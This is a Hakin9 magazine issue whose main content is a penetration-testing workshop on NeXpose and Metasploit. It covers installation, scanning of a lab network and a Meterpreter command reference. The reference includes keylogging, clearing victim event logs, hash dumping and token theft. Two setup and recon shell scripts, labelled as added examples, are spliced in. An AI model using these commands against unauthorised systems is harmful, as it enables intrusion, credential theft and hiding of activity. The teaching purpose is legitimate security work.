Hakin9 - ISO Interactive
Cyber Security Auditing Software

Improve your Firewall Auditing

As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process.

Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

www.titania.com

NeXpose and Metasploit Pro Hacking

Copyright © 2015 Hakin9 Media Sp. z o.o.
Table of Contents

07 NeXpose and Metasploit Pro Hacking by Raheel Ahmad
11 Metasploit Pro Professional Use by Raheel Ahmad
21 NeXpose and Metasploit Lab by Raheel Ahmad
31 Hacking with NeXpose and Metasploit by Raheel Ahmad
49 Basecamp – Project Management for the Sane by Troy Hipolito
74 Tackling SYN Flood attacks by Ratan Jyoti
80 Implementation of Transparent Data Encryption (TDE) and Additional Compensational Controls as Alternative Method Regarding Encryption of PAN Numbers in Microsoft SQL Database (PCI DSS v3.0, Section 3.4) by Darko Mihajlovski, Kiril Buhov, Jani Nikolov
86 Hacking Journalists by Bob Monroe
88 Offended by Offensive Security by Bob Monroe
90 Shouting at the Security Waves by Bob Monroe
92 RGB LED Lighting Shield with XMC1202 for Arduino by Bob Monroe
94 Security in Computing by Charles P. Pfleeger, Shari Lawrence Pfleeger and Jonathan Margulies, by Bob Monroe

Dear Readers,

This new issue of Hakin9 Magazine is coming out today. I hope that my words find you well and in a happy mood. I hope that you will find many interesting articles inside the magazine and that you will have time to read all of them. All comments are welcome. We collected the articles written by experts in their field to provide you with highest-quality knowledge. Enjoy your reading and develop your new skills with our magazine!

Inside this Hakin9 issue, we publish articles that will present security knowledge. If you want to find out more about penetration testing, you should read them all. We would like to highlight the articles on Nexpose and Metasploit. Also, we recommend that you read Darko Mihajlovski’s article.
“Proper” TDE implementation should cover the 3.4 requirement from PCI DSS v3, where it demands the following: Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches:
• One-way hashes based on strong cryptography (hash must be of the entire PAN)
• Truncation (hashing cannot be used to replace the truncated segment of PAN)
• Index tokens and pads (pads must be securely stored)
• Strong cryptography with associated key-management processes and procedures.

Of course, please do not forget to read the other articles. I would like to mention that as long as we have our precious readers, we have a purpose. We owe you a huge THANK YOU. We are grateful for every comment and opinion, either positive or negative. Every word from you lets us improve Hakin9 magazine and brings us closer to the ideal shape of our publication. Thank you.

Ewa & Hakin9 team

Editor in Chief: Ewa Dudzic
Editorial Advisory Board: David Kosorok, Matias N. Sliafertas, Gyndine, Gilles Lami, Amit Chugh, Sandesh Kumar, Trish Hullings
Special thanks to our Beta testers and Proofreaders who helped us with this issue. Our magazine would not exist without your assistance and expertise.
Publisher: Paweł Marciniak
CEO: Ewa Dudzic
Art. Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media sp. z o.o. SK, 02-676 Warszawa, ul. Postępu 17D, NIP 95123253396, www.hakin9.org/en

Whilst every effort has been made to ensure the highest quality of the magazine, the editors make no warranty, expressed or implied, concerning the results of the content’s usage. All trademarks presented in the magazine were used for informative purposes only. All rights to trademarks presented in the magazine are reserved by the companies which own them.

DISCLAIMER! The techniques described in our magazine may be used in private, local networks only.
The editors hold no responsibility for the misuse of the techniques presented or any data loss.

NeXpose and Metasploit Pro Hacking
by Raheel Ahmad

Welcome to the “NeXpose and Metasploit Pro Hacking” Workshop. In this workshop, you will learn more about NeXpose and Metasploit features, their usage and how you can best utilize these tools in order to perform penetration testing or a security assessment of your organization. You will be able to learn more about NeXpose, the great vulnerability assessment and management software available in the market.

In the field of security testing or penetration testing, vulnerability assessment plays an important role in order to successfully penetrate into any network or system. To achieve this goal or perform the tasks, you need a cutting edge vulnerability assessment tool in order to assess the security of the target network, or in other words, perform a vulnerability assessment. NeXpose isn’t the only tool available in the market to perform vulnerability assessment; however, it is one of the best among the industry leading tools in vulnerability assessment.
Basically, the vulnerability assessment leads to the exploitation phase in the ethical hacking or penetration testing lifecycle, and NeXpose gives you an edge and shows how you can exploit the discovered vulnerability. Industry comments: http://www.scmagazine.com/rapid7-nexpose-v55/review/3796/.

Like any other security product, NeXpose has certain requirements for its installation. You should know in detail how you can get the most out of this tool.

NeXpose Installation Requirements

Minimum Hardware
• 2 GHz+ processor
• 8 GB RAM (64 bit)
• 80 GB+ available disk space (10 GB for Community Edition)
• 10 GB+ available disk space for Scan engines
• English operating system with English/United States regional settings
• 100 Mbps network interface card

Operating Systems
64-bit versions of the following platforms are supported.
• Microsoft Windows 7, Windows 8, Server 2008 (R2), Server 2012, Server 2012 (R2)
• Red Hat Enterprise Linux 5.x, 6.x
• Ubuntu Linux 10.04 LTS, 12.04 LTS
• Kali Linux 1.0.x
• Virtualized Machines on VMware ESXi 5.x, VMware vCenter Server 4.x, VMware vCenter Server 5.x

NeXpose Editions

NeXpose comes in a couple of different editions, with flexibility and capabilities ranging from the individual user to the ultimate level, as shown in the figure below. Details on all of these editions are available on the Rapid7 official page: http://www.rapid7.com/products/nexpose/editions.jsp. Our workshops will use the Consultant edition in our lab.

Why Use NeXpose?

In the overall penetration testing or ethical hacking lifecycle, “Vulnerability Assessment & Management” is the actual phase where you discover potential vulnerabilities in the targeted network or system. There are many tools available to automate this process that enable security professionals or administrators to effectively determine the security posture of their network.
NeXpose helps in different ways to achieve this goal and provides support for performing an in-depth vulnerability assessment. This tool is better than the other vulnerability assessment tools available in the market. The best part is that it provides details on available exploits on exploit-db and the Metasploit Framework for the discovered vulnerabilities, and creates files in the same configuration as the Metasploit Modules, which you can use to configure Metasploit for exploitation. NeXpose has great compatibility with the Metasploit Framework, which gives it another edge in the industry and an advantage for security testers. NeXpose also comes in a standalone virtual box that you can integrate into your virtual servers as a separate deployment. The NeXpose scan engine and its security console give it another edge in performance and reliability. You will further explore this tool’s features in the workshop, with a complete walkthrough of its usage.

NeXpose Components

NeXpose architecture is distributed into two main components: a central server and one or more scanning engines. The central server is called the NSC (NeXpose Security Console) and the scan engine is called the NSE (NeXpose Scan Engine). The main purpose of the central server is to run a Web server process in order to provide access to its users, connect with a backend database for information storage, and drive a scan engine to scan assets. Additional scan engines can be placed similarly within the network to originate scanning under the control of the NSC. This is a distributed architecture with scan engines and servers communicating over a secure connection.

If you have a NeXpose Security Console (NSC), it will perform the following operations:
• It communicates with Scan Engines to start scans, retrieve scan information, and store scan data.
• It provides a Web interface for managing all NeXpose operations.
• It downloads product and content updates from the Rapid7 update server.
• The Security Console Appliance also includes a local Scan Engine.
• If you have a NeXpose Scan Engine (NSE), your Appliance performs asset discovery, vulnerability detection, and policy compliance testing. A Security Console controls it.

Vulnerability Assessment & NeXpose

In today’s war of performing vulnerability assessments with the tools available in the industry, one of the biggest challenges for any vulnerability management program is the analysis of scan results. If you want good, verifiable and actionable results in order to remediate them effectively, you need solutions for the discovered vulnerabilities, or else you can be overwhelmed with false positives, which can affect the overall vulnerability assessment process or program. The NeXpose architectural model above provides a design to solve this problem and gives the flexibility to build a simpler vulnerability check model with a higher degree of accuracy.

Vulnerability scans with NeXpose generate real risk analysis, credible remediation plans and easy to use data management functions. This is achieved by extensive Vulnerability Detection based on proactive scanning of systems and services; it also covers web applications and databases. To provide more focused and dedicated scans, NeXpose has templates for multiple predefined scan types, and you get the flexibility to create your own. The existing templates cover a wide range of scenarios and include full/normal audit, denial-of-service, penetration testing and database testing.
Moreover, NeXpose can also help you to identify known vulnerabilities along with configuration compliance issues for:
• Web sites/services
• Databases
• Network equipment
• Operating systems
• Applications

All this detection happens during the same scan and from the same scan engine, hence it makes it simpler for you to configure and to get all the information you need at one time for any usage.

Vulnerability Reporting and NeXpose

For an ethical hacker, or a professional penetration tester, the main challenge is to report what he or she has been doing in the overall vulnerability assessment or exploitation phases, or the complete ethical hacking lifecycle execution. This requires good presentation along with the technical details, as well as a business related management summary, so that an ethical hacker can explain what he or she has been performing while trying to ethically hack the targeted network. To achieve these tasks, when you are finished with vulnerability scans or compliance scans, you can assess the risk and determine what is most important for the targeted network environment. NeXpose includes several reports which help with this, including:
• Prioritized Remediation Report
• Top 10 Vulnerability Report
• Audit Report

These reports conclusively cover all available patches and all known vulnerabilities in the targeted network environment and provide a prioritized list of which remediations will have the most impact on risk in the environment. NeXpose also offers the flexibility to report on the assets and vulnerabilities which are important in the targeted network environment by means of rich asset and vulnerability filtering. Such reports can be automated from the UI or API so that as soon as a scan completes, remediation owners get the accurate and detailed information they need to do their jobs and stakeholders can get accurate information on how risk is changing over time.
Report generation is another major factor that makes this tool the best among the best, because it will not disappoint you if accuracy in report generation matters more than simply dumping the report content.

In summary, NeXpose provides a detailed and in-depth vulnerability assessment and management, along with assistance a step ahead in the exploitation phase of penetration testing or ethical hacking. It is recommended to have detailed hands-on skills if you want to stand out from others in the penetration testing field. We hope it’s been informative for you and thank you for completing the article. In the next article, an in-depth study of Metasploit will be covered, and later we will explore how to work with NeXpose and Metasploit together to perform an extensive security assessment.

About the Author
Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT. Founder of 26Securelabs, an Information Security consulting company. Raheel is an expert in information security with 9+ years in the domain of infosec.

Metasploit Pro Professional Use
by Raheel Ahmad

You will be studying the Metasploit Framework in depth. This will also help you study the extraordinary benefits of this security tool, which also plays a key role in the exploit development lifecycle. Metasploit is the bread and butter for many information security professionals or pen testers.

Metasploit Framework – The Hacker’s Bread

There are a couple of good exploitation tools available in the market that are used by security professionals; however, Metasploit leads the industry for a couple of reasons. There are other tools available, like Core Impact and Immunity Canvas, which lead the market along with Metasploit. The problem is that these tools are closed source and you would not be able to find even their crack or open version from any authentic source.
Metasploit comes in a community edition, which doesn’t have any major differences in features in comparison to the Pro version of Metasploit. Many freelancers and small companies in security consulting use this community edition of Metasploit, and the community edition is also used by many professionals who practice hacking in order to advance their hacking skills and exploitation techniques. I personally used Metasploit from its early days and still make good use of this framework when I need to perform exploit research and testing in my lab.

Metasploit Architecture’s Basics

Metasploit Framework is a modular framework; the most fundamental piece of the architecture is the Rex library, which is short for Ruby Extension Library. The lowest level is the core library and this is followed by base. Finally, the base library is extended by the framework UI, which implements support for the different types of user interfaces to the framework itself, such as the command line and web interface. Separate from the framework itself are the modules and plugins that it’s designed to support. Metasploit Framework fundamentals include [msfcli], [msfconsole], [exploits], [payloads], [database] and the famous [meterpreter].

Metasploit is not just an exploitation tool; it has many features that will help you in exploit research and development. Plus, you can develop your own Metasploit Modules and add flexibility as per your needs or requirements for dedicated pen testing projects. The fundamentals are just the tools you can use, or what someone who uses Metasploit as a click and go tool for performing pen testing or ethical hacking would use. This tool is awesomely developed, helps in many different ways and is widely used by information security professionals. This article will highlight as much as possible, as this tool requires a complete workshop of its own if you want to understand it and become a master of it.
However, you will be able to learn the maximum professional usage of this great tool in pen testing.

Metasploit Commands to Memorize

If you want to learn Metasploit and use it in your pen testing projects or for any security research and exploit development, then there are some core commands you should understand and have hands-on experience with.

General Commands
? – help menu
background – moves the current session to the background
bgkill – kills a background meterpreter script
bglist – provides a list of all running background scripts
bgrun – runs a script as a background thread
channel – displays active channels
close – closes a channel
exit – terminates a meterpreter session
help – help menu
interact – interacts with a channel
irb – go into Ruby scripting mode
migrate – moves the active process to a designated PID
quit – terminates the meterpreter session
read – reads the data from a channel
run – executes the meterpreter script designated after it
use – loads a meterpreter extension
write – writes data to a channel

File System Commands
cat – read and output to stdout the contents of a file
cd – change directory on the victim
del – delete a file on the victim
download – download a file from the victim system to the attacker system
edit – edit a file with vim
getlwd – print the local directory
getwd – print working directory
lcd – change local directory
lpwd – print local directory
ls – list files in current directory
mkdir – make a directory on the victim system
pwd – print working directory
rm – delete a file
rmdir – remove directory on the victim system
upload – upload a file from the attacker system to the victim

Networking Commands
ipconfig – displays network interfaces with key information including IP address, etc.
portfwd – forwards a port on the victim system to a remote service
route – view or modify the victim routing table

System Commands
clearev – clears the event logs on the victim’s computer
drop_token – drops a stolen token
execute – executes a command
getpid – gets the current process ID (PID)
getprivs – gets as many privileges as possible
getuid – get the user that the server is running as
kill – terminate the process designated by the PID
ps – list running processes
reboot – reboots the victim computer
reg – interact with the victim’s registry
rev2self – calls RevertToSelf() on the victim machine
shell – opens a command shell on the victim machine
shutdown – shuts down the victim’s computer
steal_token – attempts to steal the token of a specified (PID) process
sysinfo – gets the details about the victim computer such as OS and name

User Interface Commands
enumdesktops – lists all accessible desktops
getdesktop – get the current meterpreter desktop
idletime – checks to see how long since the victim system has been idle
keyscan_dump – dumps the contents of the software keylogger
keyscan_start – starts the software keylogger when associated with a process such as Word or browser
keyscan_stop – stops the software keylogger
screenshot – grabs a screenshot of the meterpreter desktop
set_desktop – changes the meterpreter desktop
uictl – enables control of some of the user interface components

Privilege Escalation & Password Dump & Timestomp Commands
getsystem – uses 15 built-in methods to gain sysadmin privileges
hashdump – grabs the hashes in the password (SAM) file
timestomp – manipulates the modify, access, and create attributes of a file

Metasploit Professional Use

Metasploit Framework has been in the industry for a while now and it’s the first choice of security professionals when you talk about pen testing; however, not all security professionals have hands-on experience with Metasploit, they just use it as a tool that has the bulk of exploits available that can be launched by anyone. This is not the professional usage of Metasploit. If you, as a security professional, want to stand out from such professionals, then be an expert in using this great tool. In order to have expert level experience with Metasploit, you should have the following skills developed by using this wonderful tool:
• At first you should understand how this tool works
• Modules Information
• Exploiting and Pivoting
• Customization of Modules
• Developing a Metasploit Module
• Exploit Development with Metasploit

A couple of these skills will be covered in this module and the remaining will be explored in the last module with hands-on testing in the workshop. Keep learning with hakin9!

Metasploit Usage

The commands presented above only cover some basics of the command line usage of this tool. You will be able to explore more on the Pro version of Metasploit. However, let’s quickly review what else you can do from the command line. Functionality available from the command line is given below with the usage details.

Command Line Access

Type help and you will see the core commands; some of them are shown below:

Other commands you can see are related to database functionality, as shown below in the snapshot.

Now, you can also load different modules available in the Metasploit Framework, which work in integration with other security tools for advanced usage and, basically, for professionally performing pen testing via the single command line platform of the Metasploit Framework. All the modules available by default when the Metasploit Framework runs can be found in the module directory of the Metasploit Framework. This can differ and depends on the installation directory as well as the operating system on which you have installed the Metasploit Framework. On Kali Linux, you can find these modules located on the path shown below in the snapshot.
However, there are some more modules that you can add at run time. These modules are shown below; each of these modules would be loaded into the run time environment by using the “load” command. You should practice loading these modules and use them one by one. Usage details are also available from the command and will be presented shortly here.

Loading Nessus Modules on Run Time

Loading NeXpose Module on Run Time

Loading other Modules on Run Time

Loading Famous “wmap” & “sqlmap” Modules on Run Time

Once all of these modules are loaded, you will be able to see the commands, or let’s say functionality, you can perform with these modules, like directly performing vulnerability scans from the Metasploit Framework by use of the Nessus and NeXpose modules just loaded, or running Web Application assessments with the help of the “sqlmap” and “wmap” modules loaded, and similarly for the other modules we have just loaded. The following snapshots show the available functionality after loading these modules.

Nessus features available after loading its module:

Similarly, NeXpose features are also available after its module is loaded.

After loading all of these modules, let’s look at what you will be able to perform from the Metasploit Command Line Interface:
• Nessus Vulnerability Scans
• NeXpose Vulnerability Scans
• Web Scans with “wmap”
• Database testing with “sqlmap”
• Exploitation

This is called a full-fledged pen testing platform that gives you the flexibility to run multiple tasks from a single platform. This is the power of Metasploit, and you can also develop your own module and import it into the Metasploit Framework. You will be able to explore all of these features in the upcoming modules, where you will be performing hands-on testing with these modules and developing your skills with the Metasploit Framework.
But it’s not enough at this stage; you still need to explore the exploit development features available in Metasploit which were stated earlier in the module. Exploit development features of Metasploit will be covered in the last module. In our opinion, Metasploit provides efficient use from the command line and, as a security professional, you should be an expert with the command line; that’s what the industry considers, however it is not the rule! Hackers like the “shell”. Keep learning with hakin9! We have more for you to learn and hack!

About the Author
Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT. Founder of 26Securelabs, an Information Security consulting company. Raheel is an expert in information security with 9+ years in the domain of infosec.

NeXpose and Metasploit Lab
by Raheel Ahmad

You will be learning how to set up one box with multiple core hacking tools which can help you perform ethical hacking or pen testing. You can customize these tools and get them ready for your quick usage. However, it will require suitable hardware so that you can run these tools together. You should be able to download and get the keys for editions other than the community editions of NeXpose and Metasploit Framework; however, if you only have the community versions then it doesn’t make much of a difference in learning, but it’s better to use the professional versions, if possible.

Hardware Requirements

NeXpose hardware requirements have already been presented in the previous article and Metasploit doesn’t require more than what NeXpose needs to run on a standalone machine. However, do ensure that you meet the recommended requirements if you don’t want hiccups at the time of performing vulnerability scans on a large pool of addresses or exploitation analysis on different bugs. The faster your machine is, the better your performance, and the better the output.
Choosing an Operating System Platform

NeXpose and Metasploit Framework now support multiple operating system platforms on which you can install these tools; however, security professionals’ preferences and the performance capabilities vary from OS to OS.

Operating Systems Supported by NeXpose
64-bit versions of the following platforms are supported.
• Microsoft Windows 7, Windows 8, Server 2008 (R2), Server 2012, Server 2012 (R2)
• Red Hat Enterprise Linux 5.x, 6.x
• Ubuntu Linux 10.04 LTS, 12.04 LTS
• Kali Linux 1.0.x
• Virtualized Machines on VMware ESXi 5.x, VMware vCenter Server 4.x, VMware vCenter Server 5.x

Operating Systems Supported by Metasploit
• Windows Vista, Windows 7, Windows 8.x, Server 2003, Server 2008 and Server 2012 (64 bit recommended)
• Red Hat Enterprise Linux 5.x, 6.x (x86 and x86_64)
• Ubuntu Linux 10.04, 12.04, 14.04 (x86 and x86_64)
• Kali Linux 1.0 (Metasploit pre-installed; supported on i386 and AMD64 only)

For this workshop, we initially thought to use the Ubuntu platform for running these tools on a single operating system, but then later shifted to Kali Linux, as it comes with a preinstalled version of Metasploit that you just need to update, and we will only be installing NeXpose as a standalone installation to complete our lab for this workshop. Moreover, we will be able to quickly add the different modules to Metasploit that we studied in the previous module. So for a couple of these reasons, our preference went towards Kali Linux, and no doubt Kali will give support in the overall ethical hacking cycle which other operating systems would lack.

Kali Linux

You need to be good at Kali Linux if you want to become good at hacking, as Kali Linux has now become the de-facto standard in ethical hacking and pen testing. You can easily download this OS from the kali.org website, and you can find out how to set up a virtual machine for Kali Linux in different hakin9 workshops too, so we will not be covering it here.
However, this module will cover customization of Kali Linux before you move on to setting up this lab. If you are a student or a freelancer, then a virtual environment is the best fit for you; however, performance is much better if dedicated hardware is used for this purpose.

Setup Your NeXpose and Metasploit Box

Login to the Kali Linux console and download NeXpose into Kali Linux. Once NeXpose is available for installation, continue to the first setup requirements for Metasploit to run smoothly, as you have just freshly installed Kali Linux. Follow the guidelines below as shown in the snapshots and command line. Login to the Kali console and run the following commands as shown in the snapshots below in order to set up Metasploit smoothly.

Configuring “postgresql” and “Metasploit” to run as a service at boot time, as shown below:

Starting the database and Metasploit service to perform the first time configuration, as shown below:

Type the commands to run Metasploit from the command line as shown below. It will take some time to configure the required database and configurations, as shown in the snapshot. Once configuration is complete, you will be able to see the console as shown below:

Since it is a fresh installation, it is nice to update your Metasploit Framework, as shown below, by simply typing the “msfupdate” command. Good, you can see that our fresh installation of Kali Linux is now getting Metasploit updates. After updating the Metasploit Framework, you need to verify how many exploits and payloads or auxiliary modules it has downloaded. After finishing the download and upgrade process, you will notice a change in the numbers for exploits, payloads, etc.

Cool, now you can upgrade to the professional version of Metasploit by launching the “go pro” command from its console. However, it would require you to meet the same licensing requirements.
You can complete the workshop with the community versions of Metasploit and NeXpose without hiccups.

Setting up Metasploit Console for other functionalities

Now it's time to slightly twist your Metasploit copy by enabling plugins; this simply means loading the modules available in the Metasploit Framework, as explained in the previous module. You should be able to load all of the modules explained there. You should practice these modules, especially the "Nessus", "NeXpose", "wmap", "sqlmap" and "openvas" modules, so that you cover all the security tool integrations available in the Metasploit Framework. Now your Metasploit is ready and running with these security tools integrated, and you can run scans using all of those tools and use their scan results to perform exploitation analysis.

Now you should move to the NeXpose installation: download it from the Rapid7 website from within Kali Linux, as shown in the snapshots below in sequence. Then run a command-line shell and make the installer executable, as shown in the snapshot below, using the same commands. We have taken snapshots while installing it on Kali Linux, shown below in sequence. If everything goes fine in your installation, you should be able to successfully install NeXpose on Kali Linux, as shown below in the snapshot. After finishing the installation, browse to the link shown in the above windows and enter your product license key to register this fresh copy of your NeXpose installation.

Activate NeXpose

This will take a bit of time and then NeXpose will initialize. This completes your lab setup for running both Metasploit and NeXpose in one box on the Kali Linux platform. We hope this has been informative for you, and thank you for completing the module.
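The service, start-up and update steps the workshop performs from console snapshots, gathered into one script as an added example (this is not the workshop's own code). It assumes a Kali Linux 1.x box where the init scripts are named postgresql and metasploit and are managed with update-rc.d and service, and that msfconsole accepts -q (quiet) and -x (run console commands). The two banners at the end are constructed for offline use; only the 1409 exploit figure is the one the workshop reports.

```shell
#!/bin/sh
# Added example, not the workshop's own code: Kali 1.x Metasploit preparation.
# Assumptions: Debian-style init scripts named "postgresql" and "metasploit"
# (as on Kali Linux 1.x), managed with update-rc.d and service.

# Enable both services at boot time, then start them for this session.
msf_enable_services() {
    update-rc.d postgresql enable
    update-rc.d metasploit enable
    service postgresql start
    service metasploit start
}

# Fetch the latest framework modules, the step the workshop does with "msfupdate".
msf_update() {
    msfupdate
}

# Print the msfconsole banner without staying in the interactive console,
# so the module counts can be captured by a script.
msf_banner() {
    msfconsole -q -x 'banner; exit' 2>/dev/null
}

# Pull one module count out of banner text.
#   $1 = banner text
#   $2 = module type as printed in the banner: exploits, auxiliary, post,
#        payloads, encoders or nops
# Prints the number, or nothing if that type is not present.
msf_count_from_banner() {
    printf '%s\n' "$1" | grep -Eo "[0-9]+ $2" | head -n 1 | cut -d' ' -f1
}

# Compare two banners for one module type; prints "<type> <before> <after> <delta>".
msf_count_delta() {
    before=$(msf_count_from_banner "$1" "$3")
    after=$(msf_count_from_banner "$2" "$3")
    printf '%s %s %s %s\n' "$3" "${before:-0}" "${after:-0}" $(( ${after:-0} - ${before:-0} ))
}

# Constructed sample banners (only the 1409 exploit count comes from the
# workshop; every other number is made up for this example).
SAMPLE_BANNER_BEFORE='+ -- --=[ 1409 exploits - 790 auxiliary - 226 post        ]
+ -- --=[ 358 payloads - 37 encoders - 8 nops             ]'
SAMPLE_BANNER_AFTER='+ -- --=[ 1421 exploits - 794 auxiliary - 228 post        ]
+ -- --=[ 360 payloads - 37 encoders - 8 nops             ]'

# Full run on a real Kali box: sh msf_setup.sh setup
if [ "${1:-}" = "setup" ]; then
    before_banner=$(msf_banner)
    msf_enable_services
    msf_update
    after_banner=$(msf_banner)
    for t in exploits auxiliary post payloads; do
        msf_count_delta "$before_banner" "$after_banner" "$t"
    done
fi
```

Capturing the counts before and after msfupdate turns the "notice a change in numbers" check into something a script can record; the same parsing works on the banner printed after any later module change.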
In the next module, you will be able to conduct scans and exploitation to perform hacking with Metasploit and NeXpose.

About the Author

Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT. Founder of 26Securelabs, an information security consulting company. Raheel is an expert in information security with 9+ years in the domain of infosec.

Hacking with NeXpose and Metasploit
by Raheel Ahmad

So, now you will learn how to utilize these tools for hacking purposes.

Quick Facts on Hacking Methodology

Hacking methodology needs a detailed explanation, and for this you need a separate workshop to shed light on this detailed and very technical topic. However, for your better understanding, this article will cover the core of the hacking methodology used by hackers, mostly in ethical hacking and/or penetration testing projects.

Hacking Methodology

The key steps in the hacking methodology are outlined below in sequential order and form the basis for the core hacking attempts.

Live System Scans

This is basically the information-gathering phase, in which you identify the live hosts in the targeted network of the organization. How would this be achieved? Answer: this is achieved by using scanning tools as an active information-gathering technique. You will be using the Metasploit Framework only to complete this phase, as we have all of the required Metasploit modules to run from the console alone.

Ports and Services Scanning

The second step is identifying the operating system of the hosts discovered during the previous step. This is necessary to know more about the host machine: it could be a network device, a database server, or a Windows or Linux machine. Once you have discovered the operating system type, the next step is to find the open ports and the services hosted by these machines.
However, the above two key steps can be performed in parallel by using scanning tools. How would this be achieved? Answer: this will be achieved by means of the scanning tools that are available in the Metasploit Framework as modules, or by using scanning tools for which you have added modules at run time, which we have discussed in detail in previous modules.

Vulnerability Scanning

Vulnerability assessment is the phase where you discover potential vulnerabilities in the network. There are many tools available to automate this process. Ideally, though, you cannot jump directly to discovering vulnerabilities. How would this be achieved? Answer: this will be achieved by using tools like NeXpose, Nessus and many more available on the market. Metasploit plays a key role here as well, since you have enabled the Metasploit Framework to use NeXpose and Nessus as vulnerability scanners after integrating these scanners with the Metasploit Framework.

Exploitation

Once you have performed all of these tasks, the actual time for hacking into a network or system arrives: you exploit the vulnerability and then gain access to the victim or exploited machine. This is called exploitation of vulnerabilities. How would this be achieved? Answer: this will be achieved using the Metasploit Framework, if the exploit for the vulnerability is available in Metasploit. What if the exploit is not available in the Metasploit Framework? Answer: then, if you are a security professional and know how to use Metasploit for exploit development, you should develop the exploit using Metasploit or other tools and then develop the Metasploit module for your discovered vulnerability.
Once you have this, add the newly developed module into the Metasploit Framework.

Real Time Hacking

You should now have the virtual lab ready to perform the hacking attempts and to develop Metasploit modules for vulnerabilities you have discovered yourself.

Lab Design

You should have a couple of virtual machines running in your virtual lab, and we recommend that you set up the vulnerable machine created by Rapid7; it is called Metasploitable and is available for free on their website. For this module, we will be using victim machines running the following operating systems:
• Metasploitable Linux
• Ubuntu OS
• Windows XP
• Windows 2008

Kali Linux will be our hacking platform, as configured in the previous module with NeXpose and Metasploit. We will perform hacking with the tools mentioned in this workshop and would like to cover as much as possible, virtually.

Information Gathering

Metasploit Console

We run information gathering via the Metasploit Framework by performing port scanning with "nmap". To perform this scan, first check database connectivity as shown below. Now run the "nmap" scan using the "db_nmap" command so that the scan results are saved in the Metasploit database. As we have launched a full scan, so that we can discover all the required information including ports, services and the operating systems running, it will take a bit of time. You can see in the snapshot below where "nmap" is busy performing vulnerability scans using its scripting engine. Once "nmap" finishes the scan, you should be able to see the results in the database using the commands shown in the snapshot below. You should be able to discover all the hosts in the network range provided for the scan and detect their operating systems.
In order to see the ports and services running on these hosts, run the "services" command to see such details, as shown in the snapshot below. At this stage of our hacking attempt we have all the information, including:
• Live systems
• Operating system information
• Open ports
• Services running
• Service versions

What you need now is vulnerability discovery. For this you should use NeXpose as a vulnerability scanner. You can run a NeXpose scan by simply running it from the Metasploit command line, as well as by using the NeXpose web portal. This module will cover both methods.

NeXpose Scan from Metasploit Console

Load the NeXpose module and then see the available commands, as shown below.

NeXpose Connection

First you should establish connectivity with the NeXpose scanner using the "nexpose_connect" command. Once connected, you can also check details of the system running NeXpose, as shown below. This is useful when you have multiple scanners. You can now execute a scan against the hosts discovered by the "nmap" scan you performed. NeXpose will run the vulnerability scan against those hosts using the commands shown below. You can use the options shown in the above snapshot. In the lab for this module, the scan was launched with the following options; you can also see the output of the scan in the snapshot below. While NeXpose is busy running the scan, let's log in via the web portal and see it there as well. Log in with the credentials you used during the NeXpose installation, as covered in the previous modules. The scan launched via the Metasploit console is now seen in the above snapshot, as logged via web access. Further information on the scan is also shown below. Once the scan is finished, you should be able to see the results in the vulnerability section, as shown below.
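The console sequence described in this section (database check, db_nmap, hosts and services review, loading the NeXpose plugin, nexpose_connect, nexpose_scan, and the vulns review that follows) written out as a msfconsole resource script, as an added example that is not the workshop's own code. The lab range, the NeXpose user, password and console address are placeholders; the nexpose_connect argument form user:password@host:port followed by "ok" to accept the console's self-signed certificate, and -S as the vulns search switch, are assumptions about the plugin and console syntax of the time.

```shell
#!/bin/sh
# Added example, not the workshop's own code: the information-gathering steps
# of this section as a msfconsole resource script, so the db_nmap -> services
# -> NeXpose scan -> vulns sequence is repeatable instead of retyped.
# Assumptions: the lab network and NeXpose credentials below are placeholders;
# nexpose_connect takes user:password@host:port followed by "ok" to accept the
# console's self-signed certificate; "-S" is the vulns search switch.

LAB_RANGE="${LAB_RANGE:-192.168.81.0/24}"  # assumed lab network (the victims sit in 192.168.81.x)
NX_USER="${NX_USER:-nxadmin}"              # placeholder NeXpose console user
NX_PASS="${NX_PASS:-changeme}"             # placeholder; supply the real one via the environment
NX_HOST="${NX_HOST:-127.0.0.1:3780}"       # NeXpose console on the same Kali box
WORKSPACE="${WORKSPACE:-ralab}"

# Write the resource script to $1 (mode 600, since it carries the NeXpose password).
write_recon_rc() {
    cat > "$1" <<EOF
db_status
workspace -a $WORKSPACE
db_nmap -A -T4 $LAB_RANGE
hosts
services
load nexpose
nexpose_connect $NX_USER:$NX_PASS@$NX_HOST ok
nexpose_scan $LAB_RANGE
vulns -S mysql
EOF
    chmod 600 "$1"
}

# Number of console commands in a resource script (non-empty, non-comment lines).
rc_command_count() {
    grep -cve '^[[:space:]]*$' -e '^#' "$1"
}

# Run it non-interactively: msfconsole -q -r <file> executes the script; the
# appended "exit" leaves the console once the results are in the database.
run_recon_rc() {
    printf 'exit\n' >> "$1"
    msfconsole -q -r "$1"
}

# Full run on the Kali box: LAB_RANGE=... NX_PASS=... sh recon.sh run
if [ "${1:-}" = "run" ]; then
    rc=/tmp/ralab_recon.rc
    write_recon_rc "$rc"
    echo "wrote $rc with $(rc_command_count "$rc") commands"
    run_recon_rc "$rc"
fi
```

Keeping the sequence in a script also records exactly which nmap options and which scan range produced the hosts, services and vulns tables in the database, which the snapshots in the article otherwise have to document.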
